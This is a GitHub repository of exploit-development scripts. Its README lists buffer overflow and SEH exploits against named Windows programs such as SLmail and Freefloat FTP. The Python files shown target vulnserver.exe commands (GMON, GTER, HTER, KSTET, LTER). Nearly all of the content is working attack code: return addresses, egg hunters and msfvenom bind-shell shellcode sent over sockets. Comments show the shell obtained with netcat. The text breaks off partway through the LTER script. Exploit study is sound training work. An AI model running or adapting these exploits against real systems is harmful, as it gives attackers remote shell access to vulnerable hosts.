├── README.md ├── exploit-GMON.py ├── exploit-GTER.py ├── exploit-HTER.py ├── exploit-KSTET.py ├── exploit-LTER.py ├── exploit-TRUN.py ├── exploit-dvdxplayer.py ├── exploit-easy.py ├── exploit-easyrmtomp3converter.py ├── exploit-eureka.py ├── exploit-freefloatftp.py ├── exploit-kolibri.py ├── exploit-mediacoder.py ├── exploit-slmail.py ├── exploit-sysax.py ├── exploit-xitami.py └── h2hc-LTER ├── exploit-LTER-1.py ├── exploit-LTER-2.py ├── exploit-LTER-3.py ├── exploit-LTER-4.py ├── exploit-LTER-5.py ├── exploit-LTER-6.py └── exploit-LTER-7.py /README.md: -------------------------------------------------------------------------------- 1 | # Exploits 2 | 3 | These are some of my exploits written for research purposes. Please read disclaimer section in all of them. 4 | 5 | ## Stack Based Buffer Overflow 6 | 7 | * Seattle Lab Mail (SLmail) 5.5 - [exploit-slmail.py](https://github.com/rafaveira3/exploits/blob/master/exploit-slmail.py) 8 | * Freefloat FTP Server - [exploit-freefloatftp.py](https://github.com/rafaveira3/exploits/blob/master/exploit-freefloatftp.py) 9 | * Easy RM to MP3 Converter 2.7.3.700 - [exploit-easyrmtomp3converter.py](https://github.com/rafaveira3/exploits/blob/master/exploit-easyrmtomp3converter.py) 10 | * DVD X Player 5.5 - [exploit-dvdxplayer.py](https://github.com/rafaveira3/exploits/blob/master/exploit-dvdxplayer.py) 11 | * vulnserver.exe (TRUN) - [exploit-TRUN.py](https://github.com/rafaveira3/exploits/blob/master/exploit-TRUN.py) 12 | * vulnserver.exe (HTER) - [exploit-HTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-HTER.py) 13 | 14 | ## Stack Based Buffer Overflow (with Egg Hunter) 15 | 16 | * Kolibri v2.0 HTTP Server - [exploit-kolibri.py](https://github.com/rafaveira3/exploits/blob/master/exploit-kolibri.py) - This is [How I wrote it](https://medium.com/@rafaveira3/exploit-development-kolibri-v2-0-http-server-egg-hunter-example-1-5e435aa84879) 17 | * Xitami Web Server 2.5b4 - [exploit-xitami.py](https://github.com/rafaveira3/exploits/blob/master/exploit-xitami.py) 18 | * Eureka Email Client - [exploit-eureka.py](https://github.com/rafaveira3/exploits/blob/master/exploit-eureka.py) 19 | * vulnserver.exe (KSTET) - [exploit-KSTET.py](https://github.com/rafaveira3/exploits/blob/master/exploit-KSTET.py) 20 | * vulnserver.exe (GTER) - [exploit-GTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-GTER.py) 21 | 22 | ## Structured Exception Handler (SEH) Overwrite 23 | 24 | * Sysax 5.53 - [exploit-sysax.py](https://github.com/rafaveira3/exploits/blob/master/exploit-sysax.py) 25 | * Easy RM RMVB to DVD Burner 1.8.11 - [exploit-easy.py](https://github.com/rafaveira3/exploits/blob/master/exploit-easy.py) - This is [How I wrote it](https://medium.com/@rafaveira3/exploit-development-easy-rm-rmvb-to-dvd-burner-1-8-11-seh-overflow-example-1-4b5ac6de5adc) 26 | * MediaCoder 0.8.48.5888 - [exploit-mediacoder.py](https://github.com/rafaveira3/exploits/blob/master/exploit-mediacoder.py) 27 | * vulnserver.exe (GMON) - [exploit-GMON.py](https://github.com/rafaveira3/exploits/blob/master/exploit-GMON.py) 28 | * vulnserver.exe (LTER) - [exploit-LTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-LTER.py) 29 | -------------------------------------------------------------------------------- /exploit-GMON.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - GMON - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-GMON.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # pop pop ret found at 625010B4 (essfunc.dll) (SafeSEH:False) 39 | seh = "\xB4\x10\x50\x62" 40 | 41 | # jmp back 50 bytes for Egg Hunter 42 | nseh = "\x90\x90\xEB\xCE" 43 | 44 | # mona egg -t r4f4 (egg = r4f4) 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 46 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 47 | 48 | # hopefully shellcode will be placed somewhere in memory 49 | shellcode = "r4f4r4f4" 50 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 51 | # Payload Size: 356 Bytes 52 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 53 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 54 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 55 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 56 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 57 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 58 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 59 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 60 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 61 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 62 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 63 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 64 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 65 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 66 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 67 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 68 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 69 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 70 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 71 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 72 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 73 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 74 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 75 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 76 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 77 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 78 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 79 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 80 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 81 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 82 | 83 | # evil = junk + nSEH + SEH + junk 84 | evil = "A"*(3495-len(egghunter)) + egghunter + nseh + seh + shellcode + "D"*(493-len(shellcode)) 85 | 86 | data = "GMON /.:/" + evil 87 | 88 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 89 | expl.connect(("10.0.0.35", 9999)) 90 | expl.send(data) 91 | expl.close() 92 | -------------------------------------------------------------------------------- /exploit-GTER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - GTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-GTER.py 22 | # root@kali:~# nc -nv 10.10.0.20 443 23 | # (UNKNOWN) [10.10.0.20] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | import socket 34 | import os 35 | import sys 36 | 37 | # jmp esp found at 0x625011af - essfunc.fll 38 | ret = "\xaf\x11\x50\x62" 39 | 40 | # jmp back 50 bytes \xEB\xCE 41 | jmp = "\x90\x90\xEB\xCE" 42 | 43 | # mona egg -t r4f4 (egg = r4f4) 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 45 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 46 | 47 | # a few nops 48 | nops = "\x90"*10 49 | 50 | evil = "A"*(147-len(egghunter)-len(nops)) + egghunter + nops + ret + jmp + "C"*(349-len(jmp)) 51 | 52 | data = "GTER /.:/" + evil 53 | 54 | shellcode = "r4f4r4f4" 55 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 56 | # Payload Size: 356 Bytes 57 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 58 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 59 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 60 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 61 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 62 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 63 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 64 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 65 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 66 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 67 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 68 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 69 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 70 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 71 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 72 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 73 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 74 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 75 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 76 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 77 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 78 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 79 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 80 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 81 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 82 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 83 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 84 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 85 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 86 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 87 | 88 | # sending shellcode using to GDOG hoping to be stored in memory somewhere 89 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 90 | expl.connect(("10.0.0.35", 9999)) 91 | hope = "GDOG " + shellcode 92 | expl.send(hope) 93 | expl.close() 94 | 95 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 96 | expl.connect(("10.10.0.20", 9999)) 97 | expl.send(data) 98 | expl.close() 99 | -------------------------------------------------------------------------------- /exploit-HTER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - HTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-HTER.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp eax found at 0x625011b1 - essfunc.fll 39 | ret = "B1115062" 40 | 41 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f hex 42 | # Payload Size: 355 43 | shellcode = "bbf3f063d7dacbd97424f45f2bc9b153315f12035f128334f48122461dc7cdb6dea84453efe8331040d930746d92156ce6d6b1834f5ce4aa50cdd4add20c090deade5c4c2b02ac1ce44803b08105983bd98898d8aaab894fa0f5096e658e03686aabda035847ddc590a872281d5b8a6d9a84f987d839fa5ca2e58f46046d37a2b4a2ae21ba0fa46ddf8e6906db1b8cc86d5fabcc363bd25593eaeb857c524ece9187e38dfd64ce2dfee2595eccadf1c87c25dc0f821c989f7d9fd9b6b9cb89a06874423094a1ff38331ae2c583caa2656c012d5a8c2ae7f325d708fa0e5eee966037b80e436c71a9bc46295df480ee62058758f48ec45ce590c0f472069e9431b69fbca15b0d5b31152ef46672800de26ebba710735d8f90a89e0e193c9a3409f823717d54722f2b122c8185cc834b4188ef4b1795253af724907b0888748c71f4e473a8bc153ef095bde761a4a3175cebdd9b549419831d916603ceebf7e6f058f722" 44 | 45 | alignESP = "50" # PUSH EAX 46 | alignESP += "5C" # POP ESP 47 | alignESP += "90"*32 # NOPs 48 | 49 | evil = alignESP + shellcode + "A"*(2040-len(shellcode)-len(alignESP)) + ret + "D"*1152 50 | 51 | data = "HTER 0" + evil 52 | 53 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 54 | expl.connect(("10.0.0.35", 9999)) 55 | expl.send(data) 56 | expl.close() 57 | -------------------------------------------------------------------------------- /exploit-KSTET.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - KSTET - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-KSTET.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp esp found at 625011AF - essfunc.dll 39 | ret = "\xaf\x11\x50\x62" 40 | 41 | # jmp back 50 bytes \xEB\xCE 42 | jmp = "\x90\x90\xEB\xCE" 43 | 44 | # mona egg -t r4f4 (egg = r4f4) 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 46 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 47 | 48 | # a few nops 49 | nops = "\x90"*10 50 | 51 | evil = "A"*(66-len(egghunter)-len(nops)) + egghunter + nops + ret + jmp + "C"*(30-len(jmp)) 52 | 53 | data = "KSTET /.:/" + evil 54 | 55 | shellcode = "r4f4r4f4" 56 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 57 | # Payload Size: 356 Bytes 58 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 59 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 60 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 61 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 62 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 63 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 64 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 65 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 66 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 67 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 68 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 69 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 70 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 71 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 72 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 73 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 74 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 75 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 76 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 77 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 78 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 79 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 80 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 81 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 82 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 83 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 84 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 85 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 86 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 87 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 88 | 89 | # sending shellcode using to GDOG hoping to be stored in memory somewhere 90 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | expl.connect(("10.0.0.35", 9999)) 92 | hope = "GDOG " + shellcode 93 | expl.send(hope) 94 | expl.close() 95 | 96 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 97 | expl.connect(("10.0.0.35", 9999)) 98 | expl.send(data) 99 | expl.close() 100 | -------------------------------------------------------------------------------- /exploit-LTER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - LTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-LTER.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # POP POP RET found at 6250120b (essfunc.dll - SafeSEH:False) 39 | seh = "\x0B\x12\x50\x62" 40 | 41 | # Jumping -128 bytes (FF will turn into 80) 42 | nseh = "\x4C\x4C\x77\xFF" 43 | 44 | # Fake nops as 90 is a badchar 45 | nops = "A"*120 46 | 47 | egg = "T00WT00W" 48 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 49 | # Payload Size: 356 Bytes 50 | shellcode = egg 51 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 52 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 53 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 54 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 55 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 56 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 57 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 58 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 59 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 60 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 61 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 62 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 63 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 64 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 65 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 66 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 67 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 68 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 69 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 70 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 71 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 72 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 73 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 74 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 75 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 76 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 77 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 78 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 79 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 80 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 81 | 82 | # First stage encoded egghunter 83 | # Payload Size: 124 Bytes 84 | egghunter1 = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x54\x58\x05\x50\x11\x01" 85 | egghunter1 += "\x01\x05\x41\x01\x01\x01\x2D\x01\x01\x02\x02\x50\x5C\x41\x41\x25" 86 | egghunter1 += "\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x55\x55\x55\x2D\x21" 87 | egghunter1 += "\x54\x55\x55\x2D\x49\x6F\x55\x6D\x50\x41\x41\x25\x4A\x4D\x4E\x55" 88 | egghunter1 += "\x25\x35\x32\x31\x2A\x2D\x71\x21\x61\x75\x2D\x71\x21\x61\x75\x2D" 89 | egghunter1 += "\x6F\x47\x53\x65\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" 90 | egghunter1 += "\x2A\x2D\x44\x41\x7E\x58\x2D\x44\x34\x7E\x58\x2D\x48\x33\x78\x54" 91 | egghunter1 += "\x41\x41\x41\x41\x41\x41\x41\x41\x71\x06\x70\x04" # JMP FRONT 92 | 93 | # Second stage encoded egghunter 94 | # Payload Size: 120 Bytes 95 | egghunter2 = "\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x7A" 96 | egghunter2 += "\x31\x45\x2D\x31\x7A\x31\x45\x2D\x6F\x52\x48\x45\x50\x41\x41\x25" 97 | egghunter2 += "\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x73\x31\x2D\x2D\x33" 98 | egghunter2 += "\x33\x31\x2D\x2D\x5E\x54\x43\x31\x50\x41\x41\x25\x4A\x4D\x4E\x55" 99 | egghunter2 += "\x25\x35\x32\x31\x2A\x2D\x45\x31\x77\x45\x2D\x45\x31\x47\x45\x2D" 100 | egghunter2 += "\x74\x45\x74\x46\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" 